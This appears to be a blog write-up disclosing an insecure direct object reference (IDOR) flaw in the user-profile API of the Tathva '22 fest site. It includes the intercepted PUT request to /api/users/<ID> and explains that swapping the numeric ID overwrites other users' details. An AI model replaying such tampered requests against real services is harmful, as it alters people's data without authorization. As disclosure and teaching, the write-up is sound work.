Hacked Tathva ’22 Biggest Techno-Management Fest in South India

Cyber Security

Hello, Infosec mates ッ✋✋,

In this write-up, I’m sharing a short story about how I hacked Tathva → the biggest Techno-Management Fest in South India.

(Techno-management fest of NIT Calicut)

  • It has found itself a place in every engineering student’s calendar. One of the largest platforms in South India for technical ingenuity and managerial prowess

About the Bug

  • Before I bounce into the topic, let me apprise you about IDOR. There’s a plenty amount of blogs and instructional exercises now accessible around this topic. Still, I’ll furnish a concise note about the same.

Insecure direct object references (IDOR)

  • It’s a type of Access control (or authorization) vulnerability.
  • Access control: Specifies whether the user is permitted to bring the action that they’re endeavouring to accomplish.
  • IDOR: When an application uses user-supplied input to access objects directly. If the User-controlled parameter values are used to access resources or functions directly, it can be exploited.

For more:

https://portswigger.net/web-security/access-control

https://portswigger.net/web-security/access-control/idor

IDOR in Tathva ‘22

My friend Ranjul Arumadi pointed out this event and propelled me to partake in the online Capture the Flag competition. After registration, I ensured that I’m able to edit my details at:

https://www.tathva.org/register?editprofile=true

I’m curious about security. I Intercepted the request while editing the profile and saw some juicy stuff.

First requestOPTIONS /api/users/15862 HTTP/1.1
Host: api.tathva.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: authorization,content-type
Referer: https://www.tathva.org/
Origin: https://www.tathva.org
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Sec-Gpc: 1
Te: trailers
Connection: closeSecond requestPUT /api/users/15871 HTTP/1.1
Host: api.tathva.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization:
Content-Length: 300
Origin: https://www.tathva.org
Referer: https://www.tathva.org/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Sec-Gpc: 1
Te: trailers
Connection: close{"id":15871,
"name":" ",
"gender":"male",
"college":" ",
"branch":" ",
"year":" ",
"state":" ",
"district":" ",
"phone":" "}

Vulnerability confirmation

You can see the “/api/users/<ID>” at the top of the request.

This 5-digit <ID> value can be manually altered, and the attacker can rework the details of other users without their knowledge.

Eg:

Suppose, the Attacker’s ID number = 15860.
He/she/they can alter this value and set as any five digit random value. So, the details of the corresponding user’s will change without their knowledge.

Impact

  • Integrity: High

Integrity: The ability to ensure that a system and its data has not suffered unauthorized modification. Integrity protection protects not only data, but also operating systems, applications and hardware from being altered by unauthorized individuals.

Leave a Reply

Your email address will not be published. Required fields are marked *